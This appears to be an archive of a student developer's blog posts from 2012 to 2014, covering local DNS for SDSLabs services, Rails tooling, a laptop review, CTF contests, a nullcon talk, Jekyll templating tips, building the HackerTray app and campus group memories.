A very common asked question is about our domain name and how does it work locally. When we launched filepanda, and our preliminary homepage a long time ago, we had been using the easy to remember IP address http://192.168.208.208.

Now, however we are using the domain name sdslabs.co.in for all our services, including DC. To understand how this works, you will have to understand how the name resolution of a domain name takes place.

The Domain Name System (DNS) is a hierarchical distributed naming system for computers, services, or any resource connected to the Internet or a private network. It associates various information with domain names assigned to each of the participating entities.

- Wikipedia

DNS is basically a service which resolves domain names to IP addresses. If you own a domain name, you can point it to wherever you want. This is usually done in the administration panel of your hosting services. We have setup multiple domains on our nameserver (mitsu.in as of the moment) to point to the IP address 192.168.208.x.

For instance sdslabs.co.in points to 192.168.208.208, echo.sdslabs.co.in points to 192.168.208.204 and so on. This is done via updating something called A records (this is the part of resolution which transaltes to IPv4 addresses).

The benifits of having such a system in place are enormous:

Users don’t have to remember IP addresses, and can easily remember the site address.
We can move around services, applications over different machines, and it will only take a single update to change the name resolutions
We could add alternative fallback servers easily (by having multiple A record entries) for a domain. We could even use this to point sdslabs.co.in domain to something that is hosted online, for instance.
We can have catchy, and simple to remember urls for eg https://sdslabs.co.in/login, and https://sdslabs.co.in/logout

Also, we are running all our services on https, which is not dependent upon the visibility of the website. Even though the site is hosted locally, the process of certificate signing remains exactly the same as any other site. Once we aquire a SSL certificate and attach it to our web-server, the visibility of the domain does not matter to the browser at all.

Note: For the benifit of those not in IIT Roorkee, we are running multiple web-service on the domain sdslabs.co.in, which is only served locally, as it resolves to a local IP address (192.168.208.208)

Caveat: Several DNS servers wil block RFC1913 responses by default (basically any DNS response in the private IP ranges). This is usually disabled in the intranet scenarios, but something to keep in mind if you’re looking to use this solution.

Coming back to rails

2014-07-11T00:00:00+00:00

I’ve worked with rails previously before , but that was a long time back and even though I’ve continued to dabble with it, I’d never built anything complete or large enough with it. This time, however, I’m working on an actual large-scale application with all the nuts-and-bolts that make rails such a pleasure to work with. Since I’m coming back to rails after such a long time, I thought I’d document some of the cool new features that I’ve found in rails this time around.

Spring

One of the major discomforts of working with rails on the command line was that it is heavy and slow. Spring works behind the scenes on the second issue, namely speed. Here’s how the project’s README describes itself:

Spring is a Rails application preloader. It speeds up development by keeping your application running in the background so you don’t need to boot it every time you run a test, rake task or migration.

You can update all the binaries in your PROJECT_ROOT/bin/ directory (which include rails, bundle and rake) to make use of spring by executing the following command:

bundle exec spring binstub --all

Any further execs (such as ./bin/rake -T) will make use of the spring pre-loader leading to much faster startup times. You can even use spring against the default system binaries by prefixing the commands with spring, such as spring rake -T.

Resque-Scheduler

I needed a job queue for background tasks and polling API services, and what better tool to use than resque. I’m using it in combination with resque-scheduler for running tasks on cron. How it works is that in addition to your main rails server and a long running resque job process, a separate resque-scheduler rake task is kept running, which loads up the schedule and inserts tasks accordingly into the resque queue as per the schedule.

For those new to resque in general, you can start the two processes by:

QUEUE=* rake environment resque:work #To start resque
rake resque:scheduler

Note that we are pre-loading the rails environment in the resque:work task as it will load rails for you across all of your tasks. Also note that you will need the following two lines in your Rakefile to get these tasks to run:

require 'resque/tasks'
require 'resque/scheduler/tasks'

Also remember to define the resque:setup task according to the resque-scheduler README, which would load the schedule and config as needed.

This blog post is a work-in-progress and I will continue to update it with bits of rails-foo as I learn more.

Rake-notes

I’d never tried using notes before, and as it turns out, using rake:notes is easy and super-awesome. Its allows you to spread your notes about TODOs, FIXMEs and such throughout your codebase and take a bird-eye’s look at them with just a single command.

A month with the System76 Galago Ultra Pro

2014-07-04T00:00:00+00:00

With my recent CCTC Winnings, I decided to purchase a new laptop as my old Dell Inspiron was not performing up to the mark. Being of a time before the Intel i-series launch, it was also severely lacking in several features, most notably virtualization support, which is badly needed these days.

After taking a thorough look at the various offerings in the market (and being disappointed by most of them), I decided to go with the [System Galago Ultra Pro][galago] for the following reasons:

Linux Support (Just Ubuntu actually, but its nice to have a laptop that supports and comes with Linux pre-installed).
Intel HD 5200 Graphic Card. Even though the nVidia/ATI support has been getting better in Linux these days, I wanted a graphic card that I could use without worry, for both playing games, using webGL without having to worry about things like overheating and switching card modes (optimus/bumblebee and whatnot).
Haswell. Not many manufacturers are currently offering Haswell lineups, and System76 is one of the few with them in the market.

The other few machines I did consider included the Apple MBP, Lenovo Ideapad, Dell Sputnik 13. The MBP was rejected because I wanted a Linux machine, and it was overly costly; the Ideapad had a touch screen, which I abhor; and finally the Sputnik is too expensive as well.

A few other machines were rejected because I was exclusively looking for a 14-inch screen, due in part to my experience with my previous bulky machine.

Hardware Review

The build quality of the Galago is above average, but its still a flimsy offering, when compared to the MBP or other business class offerings such as the Vostro. A lot of the Galago reviews on the internet talk about the defective keyboards, but I faced no such issues. It seems to have been fixed, and the keyboard has been iterated several times since, I think.

The IPS screen (1920x1080) is a real gem, and I’ve gotten used to watching everything in full HD these days. The laptop has 2 small fans on the lower side, and they hardly ever kick in, making it a quiet laptop. The only times it heats up much is when I’m playing demanding games or doing something GPU intensive. A few issues that I’ve actually faced with it include:

The Esc key not responding to all presses. I have to hit it with a slightly extra pressure for each keypress to register. However, this is just a quirk I’ve come to accept, and work around. My muscle memory soon overtook and I’m now used to pressing it hard.
Missing Media keys. It does have the usual Mute, Volume, and the Play/Pause keys, but the next/previous media keys are missing on the keyboard.
The charger getting heated up (a lot). It even heats up when the charger is not connected to the laptop.
The inbuilt speaker quality is definitely not above average. I usually use my earphones with it, so its not much trouble to me anyway.
The “clickpad” becomes a “touchpad” in Windows, which means drag-drop becomes extremely uncomfortable if you’re not used to it. I’ve installed the official touchpad drivers in Windows from knowledge76, but I could not find a setting to use “clicks” instead of “touch”.

As an aside, I really like the keyboard layout (I don’t like numeric keypads much) and the placement of Del-End keys, which is incidentally same as my previous laptop. I really dislike those layouts where you have to press a combination of Fn+Some key just to trigger Page Up/Down. A note to laptop manufacturers : Please stop messing with the keyboards.

Having a branded Ubuntu key is also a good show-off at some places :) I also have to mention that the laptop is very silent. The fans rarely kick in, and I have faced no heating issues so far.

Software Side

Despite being built for Linux, I’ve still faced a few software issues on Linux. None of these are a deal-breaker though for me. The first time I realized that it wasn’t really built for Linux was when I booted using my external to Ubuntu 12.04 and the WiFi didn’t work. Apparently you need a combination of System 76 custom (though open-source) drivers and 14.04 on this machine to get the drivers to work. This is one of the reasons I haven’t downgraded to Elementary Luna (which is based on Ubuntu 12.04). The issues I’ve faced (along with my workarounds) include:

Flash not working on Google Chrome Stable. I talked to System76 support over this, and I’m yet to get it working. As a workaround, I’ve been using Google Chrome Unstable (which I usually use anyway), and it detects flash fine.
WebGL support in Chrome is a bit sketchy. Chrome stable doesn’t detect the graphic card as supported, while the Chrome Unstable version did detect it as working for a while, but the graphic card was either removed from the whitelist, or added to the blacklist in a future update, making it non-working again. Currently, I’m using the “Disable WebGL Blacklist” flag from chrome://flags to get it working.
Webcam not being detected. This has gotten me a bit puzzled. It was working fine on the fresh Ubuntu 14.04 setup, but some driver issue is preventing it from working now. I think a dist-upgrade should fix it, but I’m not sure. I might try to re-install the system76-driver package if that doesn’t work. Update: It started working again after just a restart.
Another minor issue I face is that the brightness key on the keyboard (Fn+F8/F9) allows you to take the brightness level all the way down to zero. So you could make your screen pitch-black, with absolutely no idea how to get it back to normal. This happens only on ubuntu, though.

Overall

Despite its few quirks, I’m liking my new laptop. I’m enjoying gaming on it (on both Linux and Windows), and it has more than enough power to run whatever combination of VMs I want to.

Gaming

All the Linux games from my various Humble Bundle purchases are finally being put to good use. The only game that I haven’t been able to run is Oilrush, which doesn’t support Intel Graphic cards on Linux for some reason. Some of the games that I’ve tried and enjoy on Linux include:

Mark of the ninja
The Swapper
Don’t Starve
Fez
Bit Trip Runner 2
Counter Strike: Source
Portal
Half-Life 2
Civilization 5
Trine 2
Minecraft

Trine 2 does show some noticable lag on full settings, but its not supported on Intel drivers anyway. Rest of the games run wonderfully on full settings.

I haven’t tried gaming much on Windows, but I do play Blur (admittedly a 3 year old game) sometimes on it at the highest settings.

Specs

The only thing I upgraded in my laptop was an increase in RAM from the default of 4GB to 8GB, primarily because I intend to run lots of VMs on this machine. The rest is same as the specs on the official site (scroll to bottom):

Processor: Intel(R) Core(TM) i7-4750HQ CPU @ 2.00GHz
RAM: Samsung, SODIMM DDR3 Synchronous 1600 MHz (0.6 ns), M471B5173QH0-YK0 (4GiB) x2
Graphic Card: Intel Iris Pro Graphics 5200 with 128 MB eDRAM, Crystal Well Integrated Graphics Controller
Hard Disk:  Western Digital, WDC WD5000LPVX-2, 500GB (465GiB)
Memory: 8GB 204 pin Dual Channel DDR3 @ 1600 MHz (2x4GB)
Intel ME Version: 9.0.20.1447

If you’re interested in getting any further details about the laptop, feel free to contact me.

Deloitte CCTC Wave III

2014-06-03T00:00:00+00:00

I was winner of the Deloitte CCTC Wave I, and a finalist for the Wave II. It was natural I was participating this year as well. While the first year involved a simple penetration test as the first round, and it was an abstract submission in Wave II; this time it was a closed jeopardy-style CTF contest between different teams from various colleges.

There were altogether more than 30 teams participating in the CTF. I was lucky to have teammates like Abhishek Das(CCTC Wave II Winner) and Ravi Kishore who endured through several challenges when I gave up.

We’ve published all challenges over on GitHub along with writeups and problems being made available wherever we can.

The challenges ranged from very easy to difficult to absurd trivia. We topped the round with the most number of points across the board, making sure we got the +30 bonus for solving first on all but 2 challenges out of 13.

We’ll be leaving for Hyderabad for the finals in the first week of April. Wish us luck, will you.

Update: We won the final event at Hyderabad as well. More details (and a pic) on our blog post on SDSLabs here.

BackdoorCTF and Quizzes

2014-03-25T00:00:00+00:00

I recently hosted a Geek Quiz at my college along with Giri. The quiz was mostly geek with some sports and pop-cult trivia. Here are the slides for the quiz (both prelims and finals):

Geek Quiz Prelims

Geek Quiz Finals

Some audio/video files for the finals are up here.

BackdoorCTF 2014

Last year, I was the coordinator for Backdoor CTF 2013, a jeopardy-style CTF contest hosted by SDSLabs under the aegis of Cognizance. This year, I contributed 3 problems to the CTF. The problems were as follows:

web200 - Timing Attack (Source)
web250 - YAML Code Execution (Source)
web100 - _ Template Code Execution (Source)

You can find writeups/solutions to the problems all over the internet and on ctftime. Hosting a CTF is always a humbling experience and it was great to see teams from all over the world participating in backdoor. We hope to return next year with even better challenges.

Cogni Geek Quiz

After that I teamed up with Giri again (along with Sukun) for the Cogni Geek Quiz, hosted by the winner of my quiz, Vikram Rathore. While we won the quiz by a large margin (30 points), I managed to get my own tribute question wrong unfortunately.

However, it was a great experience involving some really nice questions. Update: The slides are up at mega.

Colors & Typefaces

#cbe86b

#1c140d

TypefaceOswald

TypefaceLato

#2e2633

#99173c

TypefaceOswald

TypefaceLato

My experience at nullcon 2014

2014-03-13T00:00:00+00:00

I was recently a speaker at nullcon 2014, a premier infosec conference in India. My talk was a re-hash of my earlier talk at Deloitte CCTC-2 and was titled “Browser Extension Security”.

I applied for the CFP sometime in November with a copy of my talk, paper and code I’d used. My application was reviewed and I was told, accepted under the night-track on 13th February.

The talk itself covered browser security mechanisms, and where the current state of art lies (Chrome) with respect to Browser Extensions. The talk was pretty well received (even though I sweated a lot onstage), and a lot of attendees came up to me to discuss it further after the talk.

The paper behind the talk, and the related source code can be found on GitHub. Create a new issue or send me an email in case you have any queries. ~The tool demo I gave during the talk can be found at http://nullcon.captnemo.in~ (Not available anymore). Note, however that it currently uses cached data to check for permissions, and is not a LIVE tool.

nullcon was my first conference, and I’m glad to say I enjoyed it very much. From the great hosts to the amazing parties, and all the free booze, I loved it all. I made a lot of friends, and I plan on keeping in touch. The networking level was amazing at the conference, and I was happy to get in touch with so many guys in the industry, so to speak.

A lot of people queried me about future research on the topic, and while I currently do not have enough time to pursue it, its on my radar of things to do. I’m also thinking of getting in touch with the Chrome Security Team with my research.

As an aside, a big thanks to Rushil for helping me in the first version of the paper for CCTC. It won’t have been possible without him.

##Some Clicks

I’m still waiting on receiving official clicks from nullcon. Will update this post when I get my hands on them.

Using Jekyll optimally without plugins

2014-01-20T00:00:00+00:00

If you’re a programmer, by now you’ve surely heard of the various static-site compilers that are taking over the world. My pick of choice is Jekyll, (about which I’ve blogged earlier as well) mostly because it is the default supported tool for the GitHub Pages service. Read my earlier blog post if you don’t know about Static Site Generators.

Using Jekyll means that it is far more easier for me to host my blog on GitHub Pages by just writing down posts in plain markdown. Markdown, for those of you don’t know is a simple markup language that uses an email-like syntax that is then compiled to HTML.

A lot of power in Jekyll comes from its various plugins, but I’ve always been vary of using them as the default host for Jekyll (GitHub Pages) disables all plugins and runs in safe mode. Plugins are an awesome tool to have, but they are only good if you are hosting the site on your own machines. I’m not shying away from using them but want to point out that plain-Jekyll itself is powerful enough to do most of the tasks. What follows are some examples of how to use Jekyll optimally.

Data Files

This is a recent addition in Jekyll that allows you to use data noted down in YAML format inside the _data directory that is accessible to you anywhere using the site.data prefix. For instance, I recently shifted the SDSLabs Team Page from plain HTML to Jekyll, and I used a data file to define all the required elements that are shown for every user. The data file looks something like this (_data/members.yml):

- name: "Abhay Rana"
  pic: "abhay.jpg"
  links:
    Facebook: "https://facebook.com/capt.n3m0"
    Twitter: "https://twitter.com/captn3m0"
- name: "Team SDSLabs"
  pic: "sdslabs.jpg"
  links:
    Facebook: "https://facebook.com/SDSLabs"
    Twitter: "https://twitter.com/sdslabs"

Then, I iterate over this data using the following syntax:

{% for member in site.data.members %}
<img src="pics/{{member.pic}}" alt="{{member.name}}">
<div class="img-bar">
  <span class="img-title">{{member.name}}</span>
  <span class="img-icons">
    {% for link in member.links %}
    <!-- link[0] holds the hash key = facebook/twitter -->
    <a href="{{link[1]}}"><img src="assets/{{link[0]|downcase}}.png"></a>
    <!-- link[1] holds the hash value-->
    {% endfor %}
  </span>
</div>
{% endfor %}

Earlier, you could have achieved the same thing by adding this data to your _config.yml file, but the _data folder allows you to store data properly in various files, if needed.

Liquid Filters

Since Jekyll relies on Shopify’s Liquid language for templating purposes, it has a very large list of supported functions, filters and markup tools ready for you to use. For instance, while working on the SDSLabs Portfolio, I used the split and downcase filter to convert a known list of categories to single word objects that could be used as file names.

{% for category in site.data.category %}
  <!-- category is something like "Web Development"-->
  {% assign category_name = category|split: ' '|first|downcase %}
  <a href="/category/{{category_name}}.html">{{ category }}</a>
{% endfor %}

The above snippet converts a string like “Web Development” to a smaller string “web” that can be used by us for filenames much more easily.

You can check out more liquid filters over here. These include things like plus, times, reverse, and even md5 (helpful for gravatars).

Code Highlighting

Markdown is really awesome, but it lacks Synax Highlighting for code. Jekyll uses pygments to support syntax highlighting for various languages. To highlight a piece of code, you just use the following syntax:

{% highlight ruby %}
def show
  @widget = Widget(params[:id])
  respond_to do |format|
    format.html # show.html.erb
    format.json { render json: @widget }
  end
end
{% endhighlight %}

And the output will look like this:

def show
  @widget = Widget(params[:id])
  respond_to do |format|
    format.html # show.html.erb
    format.json { render json: @widget }
  end
end

Custom Permalinks

Everyone knows about handling the blog posts permalink using the permalinks setting in _config.yml. But did you know that you can provide custom permalink to any page in your site? For instance, the Jekyll documentation site uses the following:

permalink: /docs/config/

in the frontmatter for the file docs/configuration.md. The file would have been published to docs/configuration.html by default, but the permalink in the file forces it to be published to /docs/config/index.html. Its a really nice setting that allows you to customize the post url for any particular post.

Raw Liquid Tag

In the rare case that you want to use liquid-like syntax somewhere, say you are using Handlebars (which uses {{{variable}}} to echo variables). You can use the following syntax:

{% raw %}
Here is some {{mustache}}
{% endraw %}

In fact, I’ve used the raw tags a lot in this blog post to escape all the liquid portions. You can see the liquid documentation for more help.

Side Note: Writing the endraw tag in liquid is really, really hard.

Embedding HTML/CSS inside markdown

Sometimes, there are some things that just can’t be done with markdown. For instance, if you need to use a custom tag, or need to write some css within the markdown document for some reason, there is always a way: just embed content inside <div> tags. This is not a Jekyll feature, but an implementation detail of Markdown itself, but I think its hacky enough to get a mention here.

Writing **markdown** here
<div>
  <style>
    body{
      margin-top: 10px;
  }
  </style>
</div>
Back to _Markdown_.

Anything inside a <div> tag is untouched by Markdown, and is rendered as it is.

On GitHub

2013-12-25T00:00:00+00:00

I am an Internet addict. And the website I’m most addicted to is called GitHub. GitHub is a social code hosting website that is totally awesome. Not your general run-of-the-mill awesome, but rather ass-kicking best-thing-in-the-world awesome. If GitHub was a ninja, it would be Po, defeating the evil clutches of SourceForge.

When Linux was released a couple of decades ago, it was hosted on a university FTP server. Today, the days of FTP are way past, and unless your code is hosted on a code-sharing website like GitHub, it is as good as dead. The last decade has seen an explosive grown in software and the open source movement. Things like GitHub, Linux, Android, Facebook have been made possible due to the combine efforts of millions across the globe following the Unix philosophy of doing one thing well.

Ahh, I digress. The point I’m trying to make is that it is very hard to explain to a layman how important GitHub has been to the software community. It has been used as a collaboration platform for writers, law makers, governments, programmers, and even musicians. People have used its issue tracking feature to even plan weddings. And above all, people adore GitHub. It is one of the few startups that have been accorded God status in the community.

The question here is what makes GitHub tick? As the largest hosting site for code, it obviously makes a huge impact just by virtue of being there. But its tide of features and innovative progression had made it a darling of all. For instance, their 1 click to fork feature has allowed people to contribute to any project so much easier.

GitHub has an amazing User Experience, making sure it works perfectly on all devices large or small. Their amazing support makes sure all of its users are happy as possible. Their regular meetups makes sure that GitHub is invested in the software community themselves. And their GitHub Store lets people invest back in GitHub by romoting them via Tees, stickers and even laptop sleeves.

My personal experience with GitHub has been overwhelmingly positive. People have stood beside GitHub even as they faced major issues, and for me that is indicative of a trust in GitHub that no money can buy. The GitHub API (which I’ve used more than once) lets developers create their own apps on top of GitHub which others can use to create even more awesome things.

For me GitHub is more than just a coding website. It is a testament to creativity and the Hacker Way, reminding me every day that anything is possible.

Making HackerTray

2013-11-28T00:00:00+00:00

A few days back, I found the excellent HackerBarApp via Hacker News. Hacker News, for those of you who don’t know, is tech news website run by YCombinator. Hacker Bar was the simplest way of accessing HN stories that I’d ever seen. Unfortunately, it was only for Mac (made using rubymotion) and even though the source was available, it was of no use to me as a Linux User.

I decided to make a clone of Hacker Bar that would work on Linux. My first choice of the stack was node-webkit, an application framework that allows you to build cross-platform applications using HTML, CSS, JS, and modules from the node.js ecosystem. After reading a lot about node-webkit, I figured out that building this application in node-webkit (as it stands) would not be possible. Or rather, it would not work under Ubuntu and its derivatives because of lacking appindicator support in node-webkit. More details here.

The next obvious language and stack of choice was Python + Gtk. I’d already played a little bit with Gtk and Python some time back, so I knew the basics. But I’d never build a real application with PyGtk, just toys and small scripts. I found a basic skeleton app that was written for AppIndicator and modified it somewhat to form the base of HackerTray.

The next challenge I faced was keeping the check boxes always checked despite of any number of clicks after the first. That is, we don’t want any menu item to be “un-checked” at any moment. A basic idea is to do this (partial code):

def open(self, widget):
	if(widget.get_active() == False):
		widget.set_active()
	webbrowser.open(widget.url)

def addItem(self, item):
	#create a new CheckMenuItem (i)
	i.connect('activate', self.open)

However, this does not work as expected, because the widget.set_active() call also results in the activate event being fired, which ultimately calls open. This means on a click to an unchecked menuItem, the open function is called twice. This results in the browser opening the link twice.

As a workaround, I disabled the event handler in case it is a checked menuItem:

def open(self, widget):
	if(widget.set_active() == False)
		wiget.disconnect(widget.signal_id)
		widget.set_active(true)
		widget.signal_id = widget.connect('activate', self.open)
	webbrowser.open(widget.url)

def addItem(self, item):
	#create a new CheckMenuItem (i)
	i.connect('activate', self.open)
	i.signal_id = i.connect('activate', self.open)

The next thing I worked on was a persistent memory for the app. In a nutshell, I needed to make sure that the tick on an item remained there, even if the app was restarted. This meant writing a list of all the “viewed” items into a file. After looking at shelve for a bit, I just rolled my own implementation , based on storing the data into ~/.hackertray.json file.

After that I worked on packaging the app into a python package, so that it could be easily installed. The python packaging tutorial was an easy to use guide that let me create the package easily and push it to the Python Package Index. A few issues in the package were found, and were fixed quickly thanks to the pull request by @brunal.

After improving the README a bit, I posted about it on Hacker News, where it failed to get any traction. I re-tried with a link to the HackerTray website, and that fell flat as well. It was on the next day, when I posted it to HN for the third time, that it took off. After 50 or so upvotes, I found that my instance refused to run because it had hit the API Rate Limit on the excellent node-hnapi. I quickly pushed a fix that used a list of servers to hit as fallback in case it crossed the Rate Limits.

After a lot of feedback from HN, I started work on a node-webkit based clone of hackertray for Windows. I should be able to release it in a few more days, if nothing else crops up. Keep watching this space for info. If you have any queries, just file an issue on GitHub or [email protected]">contact me.

Aboard the Nautilus

2013-09-21T00:00:00+00:00

I’d done a post on this a long time back (2009), detailing what all softwares I use on a daily basis. This is an update to that post.

Since the last post, I’ve moved on to using Linux, using Elementary OS as my primary OS. Over the time period this post was written, I’ve shifted from using Cinnamon to Openbox and finally to elementaryOS’s pantheon as my Desktop Manager. I’m thinking of switching to Arch Linux, just to get a faster experience. I use Synapse as my application launcher, because its much faster than anything else out there.

For most of my web browsing needs, I rely on Google Chrome Stable and a daily build of Chromium (v31 as of now) for most of my work. I switch between them all the time. I use Firefox (stable) only to test out my projects from time to time.

The current editor I use is Sublime Text. It is everything you need, and much more. I’m still to get started using its build system, and its plethora of packages; but its still an excellent choice for a daily use editor. On the command line, I use Vim, git (with SCM Breeze), fasd and tig, which is an excellent git interface on the command line.

I listen to music on my own browser-based music player, called Muzi, YouTube and GrooveShark.

For my terminal needs, I use Gnome-Terminal. I use Byobu to manage my session, and often connect to it from other computers as well. Its an excellent multiplexer that fits in my workflow really well.

I use Imo.im on both the Desktop and my tablet to chat. I occasionally use ReText for editing markdown files. I use RedShift on my laptop and f.lux on my iPad to help me sleep better. I recommend it to everyone who is suffering from eye-strain or wants to sleep better.

On the browser, my most visited sites would be Hacker News (via hckrnews.com), WorkFlowy for managing my to-do list and GitHub on a daily basis for most of my projects.

Hardware

I own a old Nokia X3-02, and will be upgrading to a Firefox OS Phone soon enough. I use a Dell Inspiron 1545 as my personal machine. I also use an iPad 2 (with 3G) on a daily basis (mostly for reading). I also own a Dayan Zhanchi 3x3 and a 5x5 shengshou speed cube.

iPad Apps

The must have iPad apps for me are Chrome, imo, and iBooks. I have installed Mailbox alongside GMail, and haven’t used GMail since I installed it. I sometimes write stuff using Plaintext, and sketch using Paper. I read my RSS feeds using Newsify and Feedly.

Extensions

Chrome Extensions that I use on a daily basis include Chime for wonderful notifications (highly recommended), Ghostery for getting a tracker-free internet , HTTPS Everywhere to keep me secure, LastPass to manage passwords and Stylish for customizing the looks of various websites.

Dream Setup

My dream setup would consist of a lightweight Ubuntu Laptop that I can carry around that still has lots of processing power and battery life. I’ll prety much be satisfied by any high-end Android phone as long as it has a decent battery life.

Why I still recommend Windows

2013-07-21T00:00:00+00:00

Even though I am a long time Linux user, and a big time fan of the many Linux distros that I’ve tried out over time, I still go around recommending Windows to people who ask me for advice. The only exception I make is when the person in question is a developer, in which case I try to convert them to the Church of Linux.

The main reason I recommend windows to non-developers is because it is a far better operating system than most Linux distributions (for general public). Now, before you bring out your pitchforks, hear me out.

The first and foremost reason that I give is that Windows sports a far better integration across all its services. Nautilus/Nemo in the Linux world do not reach same level of integration that Windows Explorer does. For instance, just look at the way the “Send To” feature works in explorer. To add a folder to the send to entry, you just have to add a shortcut to that folder inside the special “Send To” folder. On nautilus, the equivalent would be going about installing an extension, and editing a configuration file by hand.

Or take a look at how the “Play All” feature in Explorer. Or the “Libraries” feature in Windows 7. Or the simple way that you handle file sharing in Windows. Even though Linux has (arguably better) Samba support for files sharing, you have to go about editing a handful of files to make it work. I personally find apache easier to configure to just share files one way.

Games are another reason. Even though Steam is available on Linux, all of the non-Valve triple-A titles are missing on Linux. Even though I continue to buy and play the Humble Bundles that offer Linux as a platform, I’m reminded of the stark reality every day when my friends ask me if I’ve played a recent title such as Call of Duty, Metro, NFS or even Swapper.

The next peeve that comes to my mind is the ridiculous driver support. It has been improving since a long time, but its still not there. Even Ubuntu needs to fetch proprietary drivers for my WiFi support on Broadcom, which needs an internet connection in the first place. This means I need to find out a LAN network connection to even start using Ubuntu. Similarly the pain I’d to go through to install drivers for Ralink network drivers on a friend’s laptop was immense. I can never use circular scrolling or touchpad zoom on my laptop in Linux because there are still no drivers available anywhere for it. And don’t get me started on UEFI boot issues. No matter what people believe or pretend, hardware support is just not good enough to be relied on in the Linux world. As a side note, I haven’t synced my iPad in Ubuntu since I shifted to iOS 5, and apple driver support on Linux will remain abysmal forever just because iTunes will never be released for Linux. The last version of iOS that had music sync support (via libimobiledevice) was iOS 4.0 (released 3 years ago in June 2010).

Next I want to point put out the upgrade pain that everyone has to go through. It’s like a constant rite of passage, which turns a Linux noob into an actual user. I am yet to do an Ubuntu upgrade which went smoothly and didn’t break a thing; and I’ve been upgrading my Ubuntu since 10.04 was released. The upgrade tag on askubuntu is chock full of horror stories.

Another thing that frustrates me to no end is that the Ubuntu Dash, and the GNOME Overview are both slow as hell. I’m currently using Cinnamon, which is faster than both of these, but still an order of magnitude slower than the Windows Start Menu. Synpase is better, but cannot be set as the deafult.

I was using Windows 7 on my cousin’s laptop these last few days and I remembered the favourite app that I used to no end: Everything. It is the quickest file search I’ve ever used. The alternatives, in the Linux world are synapse, zeitgeist, and plain old locate command. The only issue is that I’ve to manually run updatedb manually, while Everything was always up to date, using the NTFS File Journal. To this date, I am yet to find a good enough alternative to Everything.

It is true that Windows lacks many of the good things that Linux distros provide, such as the excellent package management support, POSIX compatibility, and the plethora of tools we get on the command line; but at the same time, it is also a better operating system for most of the masses. I’ll continue to recommend Windows to all my non-developer friends till “The year of Desktop Linux” arrives.

SDSLabs - My experiences

2012-12-27T00:00:00+00:00

Introduction

For the past two years, I have been involved in a student group in our campus called SDSLabs. It has been the most fun two years of my life. I have acted as programmer, developer, manager, monkey-coder, event-manager and all other roles one might expect in a startup. However, I have never really blogged about any of this. Someone pointed it out recently to me, the truth is I have been meaning to write this since a very long time, but its kind of hard to put down in words. I’ll try my best. This post is highly specific to iit roorkee (you have been warned).

Chronology Of Events / Timeline

Back in my first year, after joining something called SDS as a proficiency in the campus, I was learning PHP. With no-one to guide me, I had only attended a single talk by Shobhit Singh where he talked about dynamic websites. I was instantaneously hooked. I did something called lion, a twitter clone and it won 3rd prize in Srishti. It had follow, unfollow, messages, tweets, and groups (one feature which set it apart from twitter).

The code was a mess of php and inline html, and I have never looked upon it since. I did a couple more projects by myself , learning the in and outs of php (I was still to hear about ruby/python). At the end of my first year, I did a project management system under Kumar Shashank who taught me about MVC and the need of architecture in a software application.

At the very end of the project, a group called SDSLabs was formed. Along with a few people Shobhit sir had found, we founded SDSLabs. Everyone in the group was passionate about building things. And somehow, magically, I was in it. And there began the most beautiful chapter of my life..

Coding & Learning

After completing the PMS (Project Management System), I moved on to work on Filepanda, and then the entire framework application for SDSLabs. All our applications are powered by a single API, which I wrote. Meanwhile, Harshil was working on DC++, and other awesome things. I met pranav sir, and was introduced to the thousand-quirks-of-css. It shifted to mint, and then to ubuntu. I learned the ins-and-out of managing a linux system. Back then SDSLabs was limited to the small committee room in Hobbies Club (with Shobhit Sir working tirelessly on funding for a better lab).

And I met Ishan Sir. If you are reading this, thank you for teaching me how to learn. I had tons of night-outs with him discussing things I barely remember now. I became a creator. I executed on tons of ideas. Most never saw the second day in their lives, but I still have them with me, as memento of the past and what was to be. Ishan Sir was a gold-mine for learning. Everything I could ever ask, and he’d hand over a resource. Some of my most productive learning days were spent with him.

Recruitments

After a single semester of work, we held our first recruitments. I wrote my first blog post for the lab at the time noting down my amazing reaction to the awesome people that had joined the lab.

It is difficult to distil into words the awesome learning experience I had with all these people. Going to chapos, thinking about how we could expand. What else awesome stuff we could do? One night hackathons, where we coded awesome stuff.

And I started to work on Muzi, which was to be my application. It stands at 811 commits today, with over 200 issues in our project management system. I went into the development knowing PHP and bits of AJAX, and came out a JQuery fanboy. Muzi has been my primary music player for almost an year now. It feels awesome to listen to music on a music player you coded. The initial version was based on Zune’s design on Windows. We kept on improving it till it was exactly what we wanted. Today, people have listened to almost 1 lac songs on Muzi, and it feels awesome to have been behind something that is so widely used (within the campus).

Launch

The next semester involved our actual launch (11-11-11) of all our applications. We had all converted into semi-breathing coding machines cum zombies by that time though. Sleepless and exhausted, we did prevail, and launched a few hours early. The Launch was appreciably recieved in the campus, although I had to leave for the Deloitte CCTC Contest the very same day(which we won!).

I ended up doing a rewrite of Codematics (codename CodeBot) in node for the launch. It has a geeky, command line interface which was inspired by goosh and xkcd’s unix interface. Along with that, Muzi was launched to huge appreciation as well.

Recruitments Again

This was the semester where our group actually expanded. Our count is almost 42 now, and nothing could make me more glad than actually being with all these people.

I donned lots of hats teaching, guiding, coding, and managing people. Linux became one of my top skills, and I learnt a lot. We shifted to Redmine for management, and I ended up doing a lot of server-administration related stuff (gitolite,redmine,vhosts ,apache,varnish etc).

It has almost been a year since our last recruitment. We have been working of tons of things; some of which will be launched soon. I took lectures on far apart topics from “Usability Designing” to [“Software Development 101”].(https://speakerdeck.com/captn3m0/software-development-101) I mostly worked on internal features, improving our API, and something called Presence. We also participated in two hackathons, and we won both of them.

Where, now?

Our group is still nascent, and although I have not mentioned every project that the group (or even I) have done for fear of making this post too long. That itself speaks volumes about what we’ve done in a short span of two years. Our tagline reads “iDream. iCode. iInnovate”. I wish for the group to continue on that path. Develop things that make life easier; for everyone around the world.

People

Throughout this journey, there have been lots of people, without whom this blog post would never have been written. You all know who you are. Keep being awesome.

Skills

I used to call myself a programmer, but now I’m in a more management-esque role in SDSLabs. Its my share of the work to manage projects, and track progress. That does not mean that I’ve given up coding, and I still do code a lot for our internal projects. I have also become somewhat of a UX enthusiast, taking care of most ux work done in lab. I have also found myself becoming an avid learner, and have Ishan Sir to thank for that.

Anecdotes & Stories

This post already reads more like a things-i-did-at-sdslabs, which is something I was hoping to avoid, instead of why-i-love-sdslabs, which is what i wanted. So I’m gonna stick a few moments and events that stand out to me…

We have a board with three defining people on it: Steve Jobs, Dennis Ritchie, and Linus Torvalds.
We have had mind-blowing pizza chapos. So many pizzas that they were brought in 2 rickshaws from dominos. Yup.
I am known as the bot in lab. Mostly because of my highly rational unemotional responses, and other things. There is another person, who is trying to get that title, though.
